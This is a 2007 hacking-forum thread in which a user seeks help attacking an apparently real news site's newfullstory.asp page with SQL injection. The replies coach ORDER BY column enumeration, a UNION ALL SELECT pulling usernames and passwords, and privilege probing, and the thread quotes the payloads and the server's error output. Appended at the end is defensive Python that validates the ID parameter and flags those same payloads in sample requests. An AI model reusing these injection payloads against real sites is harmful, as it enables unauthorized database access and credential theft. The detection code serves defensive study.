HellBound Hackers | Computer General | Web hacking


mssql injections :-/


Posted on 11-05-07 04:14
For the past 2 hours I've been trying to exploit a page I found that I think is vulnerable to SQL injection. After reading countless articles and PDFs I'm left confused. The URL looks like this:

newfullstory.asp?ID=

when I put this query in the url:

newfullstory.asp?ID="or'='--

I get the following error:

Microsoft OLE DB Provider for SQL Server error '80040e07'

Syntax error converting the varchar value 'or=--' to a column of data type int.

/news/lani/newfullstory.asp, line 357

I read an article http://www.securiteam.com/securityreviews/5DP0N1P76E.html

and it said if you get that error and you put this query in the url:

SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--

and this should output: Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'table_name' to a column of data type int.
/index.asp, line 5


but when I do it all I get is this:

Microsoft OLE DB Provider for SQL Server error '80040e07'

Syntax error converting the varchar value '114124 SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES-' to a column of data type int.

/news/lani/newfullstory.asp, line 357

So I'm out of ideas and I'm going to continue searching, but if anyone has any idea of what is going on and could reply, I'd appreciate it very much.

- A~hack







Edited by on 11-05-07 04:15

RE: mssql injections :-/


Posted on 11-05-07 04:24

For starters I believe the m$ dbase wants /* for comments instead of -- (though I could be wrong. Give it a try though.)

It looks to me like you put 2 ' in that first example. Try just putting 1 to close it, then the OR portion.

2ndly, this is a BLIND SQL injection, which has different rules, so reading SQL injection tuts will only semi help you. You cannot do a specific select for these; you have to do a
UNION ALL SELECT (all the fields) FROM table --
example:
UNION ALL SELECT username, password, uid FROM users --
if those were it...
you can find these by doing
newfullstory.asp?ID=4 ORDER BY 1/* (or -- if it is that)
that should work
if it does do
newfullstory.asp?ID=4 ORDER BY 2/*
then 3, 4, 5, etc. till you throw an error


enjoy




Edited by on 11-05-07 04:26

RE: mssql injections :-/


Posted on 17-05-07 16:38
See if you can find what privileges (or user) you're running the SQL queries under.
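
The error messages quoted in this thread show the ID value reaching an integer conversion inside SQL Server without being checked by the page first. As an added example (not part of the thread or of any poster's code), here is a strict integer check for that parameter together with a scan that flags request lines whose ID fails it. The sample requests are constructed, and the function names are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample requests (client IP, request target); not real log data.
# The ID values are the ones quoted in the thread, percent-encoded.
SAMPLE_REQUESTS = [
    ("203.0.113.5", "/news/lani/newfullstory.asp?ID=114124"),
    ("203.0.113.9", "/news/lani/newfullstory.asp?ID=%22or%27=%27--"),
    ("203.0.113.9", "/news/lani/newfullstory.asp?ID=114124%20SELECT%20TOP%201"
                    "%20TABLE_NAME%20FROM%20INFORMATION_SCHEMA.TABLES--"),
    ("203.0.113.9", "/news/lani/newfullstory.asp?ID=4%20ORDER%20BY%201/*"),
    ("203.0.113.7", "/news/lani/newfullstory.asp"),
]

# One to nine decimal digits always fits a 32-bit SQL Server int column.
INT_RE = re.compile(r"[0-9]{1,9}")

def parse_story_id(raw):
    """Return the ID as an int, or None if it is not a plain decimal integer."""
    if raw is None or not INT_RE.fullmatch(raw):
        return None
    return int(raw)

def get_id(target):
    """Extract the decoded ID parameter (case-insensitive name) from a request target."""
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    for key, values in query.items():
        if key.lower() == "id":
            return values[0]
    return None

def flag_requests(requests):
    """Return (ip, decoded ID) for requests whose ID is present but not an integer."""
    hits = []
    for ip, target in requests:
        raw = get_id(target)
        if raw is not None and parse_story_id(raw) is None:
            hits.append((ip, raw))
    return hits

if __name__ == "__main__":
    for ip, value in flag_requests(SAMPLE_REQUESTS):
        print(f"{ip}: non-integer ID {value!r}")
```

The same check belongs in the page itself before the query is built, alongside a parameterized query, so a non-integer ID is rejected instead of reaching the database and producing the conversion error shown above.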